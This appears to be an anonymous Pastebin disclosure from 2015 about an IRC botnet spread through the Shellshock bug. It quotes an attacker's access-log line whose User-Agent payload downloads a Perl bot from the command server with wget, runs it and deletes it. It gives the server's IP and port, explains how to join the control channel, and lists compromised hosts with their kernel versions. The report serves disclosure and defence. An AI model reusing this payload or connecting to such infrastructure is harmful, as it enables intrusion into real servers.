Public Pastes
daily pastebin goal
87%
SHARE
TWEET

irc botnet disclosure 08/JAN/2015

a guest Jan 8th, 2015 416 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  _____________________________________
  2. [```` BOTNET INVESTIGATION REPORT ````]
  3.  `````````````````````````````````````
  4.  
  5.  Date: January 08, 2015
  6.  Botnet type: IRC Bots/Malware
  7.  Botnet control server IP: 212.227.55.192   (1&1 Internet AG)
  8.  Protocol: IRC
  9.  Port: 444
  10.  Hacked hosts: >500
  11.  Previous report of the same botnet: http://pastebin.com/DabxDiwm
  12.  
  13. Screenshot proofs:
  14.   1] http://i.imgur.com/ppovvBo.png  (command /lusers)
  15.   2] http://i.imgur.com/Arbygom.png  ( some bots )
  16.   3] http://i.imgur.com/LWVeDjT.png  ( shows how many channels admin has )
  17.  
  18. A following access.log record has been found today on my web-server:
  19. ....
  20. 82.165.11.172 - - [08/Jan/2015:09:15:36 -0500] "GET /phppath/cgi_wrapper HTTP/1.1" 404 162 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESSX\x22;system(\x22wget http://212.227.55.192/android.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\x22);'"
  21. ....
  22.  
  23. We can clearly see that this is a shell-shock exploitation try and the source code is here:
  24.  http://212.227.55.192/android.txt   ( MIRROR: http://pastebin.com/jk6aqUd8 )
  25.  
  26. From the source code we can clearly see that this is an IRC bot that connects to a following server:
  27. $servidor='212.227.55.192' unless $servidor;
  28. my $porta='444';
  29.  
  30. Type /server 212.227.55.192 444   in your IRC client and you will see some channels and many hacked hosts exploited by the vulnerability and controlled by this bot.
  31. Then type /join #sec   to join the botnet controlling channel.
  32.  
  33. We see that admin under nick X as an channel operator at #sec
  34. Do /lusers and we can see the bots quantity:
  35. * There are 0 users and 500 invisible on 1 servers
  36. * 2 :operator(s) online
  37. * 4 :unknown connection(s)
  38. * 12 :channels formed
  39. * I have 500 clients and 0 servers
  40. * 500 1018 :Current local users 500, max 1018
  41. * 500 500 :Current global users 500, max 500
  42.  
  43.  
  44. Here are some /who commands so we can see some obscured hosts of the hacked servers and their OS (uname -r)
  45. -->
  46. * #sec test rox-49D65EBE.bredband.comhem.se irc.foonet.com SESSID|3948 H :0 test
  47. * #sec BOT rox-E5B280AE.coma.de irc.foonet.com SESSID|482960 H :0 Linux 2.6.26-2-openvz-amd64
  48. * #sec BOT rox-83679877.km20409-04.keymachine.de irc.foonet.com SESSID|962793 H :0 Linux 2.6.18-028stab095.1-ent
  49. * #sec BOT rox-717533E5.stratoserver.net irc.foonet.com SESSID|88903 H :0 Linux 2.6.32-042stab092.3
  50. * #sec BOT rox-114A1AAF.virtual25.hostfactory.ch irc.foonet.com SESSID|468975 H :0 Linux 2.6.32-5-686-bigmem
  51. * #sec BOT rox-9B238E4A.virtual25.hostfactory.ch irc.foonet.com SESSID|572690 H :0 Linux 2.6.32-5-686-bigmem
  52. * #sec BOT 82124A22.26EA50E7.41750D6A.IP irc.foonet.com SESSID|149625 H :0 Linux 2.6.18-028stab092.1
  53. * #sec BOT 929C9169.25A2E430.F5DFE6A4.IP irc.foonet.com SESSID|933301 H :0 Linux 2.6.32-042stab078.28
  54. * #sec BOT rox-5B2B79A3.com irc.foonet.com SESSID|469976 H :0 Linux 2.6.18-028stab101.1
  55. * #sec BOT rox-51967A51.redes.interdominios.com irc.foonet.com SESSID|789575 H :0 Linux 2.6.32-042stab075.2
  56. * #sec BOT rox-791890C4.server4you.net irc.foonet.com SESSID|892113 H :0 Linux 2.6.32-028stab107.1
  57. * #sec BOT FB650128.CBAC5E7E.CA5432A4.IP irc.foonet.com SESSID|432809 H :0 Linux 2.6.18-028stab101.1
  58. * #sec BOT rox-AA5054AA.servy.net irc.foonet.com SESSID|831330 H :0 Linux 2.6.18-028stab101.1
  59. * #sec BOT BE81A736.68B2DD81.CA5432A4.IP irc.foonet.com SESSID|256132 H :0 Linux 2.6.18-028stab101.1
  60. * #sec BOT rox-A7D60EB7.ch irc.foonet.com SESSID|219372 H :0 Linux 2.6.18-274.18.1.el5
  61. * #sec BOT rox-D9C7DD67.nordicweb.de irc.foonet.com SESSID|256879 H :0 Linux 2.6.32-5-openvz-amd64
  62. * #sec BOT rox-85B681AA.onlinehome-server.info irc.foonet.com SESSID|36075 H :0 Linux 2.6.25.8-20080623a
  63. * #sec BOT rox-9BE9DB55.com irc.foonet.com SESSID|379475 H :0 Linux 2.6.18-028stab101.1
  64. * #sec BOT rox-E2ED4581.razorplanet.com irc.foonet.com SESSID|117481 H :0 Linux 2.6.18-194.17.1.el5
  65. * #sec BOT 83ED5BF.CBAC5E7E.CA5432A4.IP irc.foonet.com SESSID|199937 H :0 Linux 2.6.18-028stab101.1
  66. * #sec BOT 11D765A4.FF69AAF7.4DB71D68.IP irc.foonet.com SESSID|865494 H :0 Linux 2.6.18-028stab068.5
  67. * #sec BOT FC2F9C79.B37C2181.9F171C6F.IP irc.foonet.com SESSID|695833 H :0 Linux 2.6.18-194.17.1.el5
  68. * #sec BOT rox-B61FAFA0.servy.net irc.foonet.com SESSID|488506 H :0 Linux 2.6.18-028stab101.1
  69. * #sec BOT FCAB42A5.CBAC5E7E.CA5432A4.IP irc.foonet.com SESSID|472686 H :0 Linux 2.6.18-028stab101.1
  70. * #sec BOT rox-E1951810.onevent.biz irc.foonet.com SESSID|330890 H :0 Linux 2.6.18-028stab101.1
  71. * #sec BOT rox-8FA181CB.org.sg irc.foonet.com SESSID|672508 H :0 Linux 2.6.18-028stab101.1
  72. * #sec x localhost irc.foonet.com Y H* :0 x
  73. * #sec undead localhost irc.foonet.com X H*@ :0 DARK SIDES
  74. * #sec :End of /WHO list.
  75. * #new test rox-49D65EBE.bredband.comhem.se irc.foonet.com SESSID|3948 H :0 test
  76. * #new new2847 4E583BB6.F24EB7F7.9C2BBDA7.IP irc.foonet.com new3866 H :0 new6235
  77. * #new new1166 E7EDA047.34B32E90.EF7CE05F.IP irc.foonet.com new2240 H :0 new8859
  78. * #new new293 rox-163D0003.clinicamontesur.com irc.foonet.com new7054 H :0 new1748
  79. * #new new9 5943381B.89BF3372.7DA3909E.IP irc.foonet.com new293 H :0 new1456
  80. * #new new1364 rox-D1E84110.compute-1.amazonaws.com irc.foonet.com new2394 H :0 new2438
  81. * #new new878 rox-C7C13CC6.digitalis.hu irc.foonet.com new5814 H :0 new5160
  82. * #new new3117 rox-28EF4333.reverse.softlayer.com irc.foonet.com new4687 H :0 new7963
  83. * #new new8347 rox-C2411E1B.ispfr.net irc.foonet.com new8849 H :0 new7111
  84. * #new new3213 BBC5901.D02C8812.9A49432E.IP irc.foonet.com new1553 H :0 new7058
  85. * #new new2818 rox-116B5161.compute-1.amazonaws.com irc.foonet.com new6454 H :0 new2815
  86. * #new new809 rox-DC1EAFE7.retail.telecomitalia.it irc.foonet.com new8090 H :0 new1515
  87. * #new new2181 2CC322AA.E29126FD.A9258F1E.IP irc.foonet.com new2678 H :0 new4708
  88. * #new new3368 D9B7AA8E.62A2946F.F344D4F0.IP irc.foonet.com new3887 H :0 new8141
  89. * #new new8762 rox-6063A476.subnet222-124-28.astinet.telkom.net.id irc.foonet.com new5649 H :0 new3573
  90. * #new new5808 106E28BB.28E25879.406203A3.IP irc.foonet.com new5615 H :0 new1723
  91. * #new new1560 7AF996A0.499FA39F.E3C8470A.IP irc.foonet.com new572 H :0 new1865
  92. * #new x localhost irc.foonet.com Y H* :0 x
  93. * #new undead localhost irc.foonet.com X H* :0 DARK SIDES
  94. * #new new5286 rox-AB6B78B7.ve.servadmin.com irc.foonet.com new2009 H :0 new2302
  95. * #new new7979 rox-BABFB58F.chickencluster.com irc.foonet.com new6052 H :0 new6077
  96. * #new new4041 rox-BD803A7D.mabafo.org irc.foonet.com new3527 H :0 new8942
  97. * #new new3917 7251BE99.51585D3B.D4421BC5.IP irc.foonet.com new1756 H :0 new4793
  98. * #new new3208 rox-AA5C9D9.grupoitnet.com irc.foonet.com new7595 H :0 new5876
RAW Paste Data
Top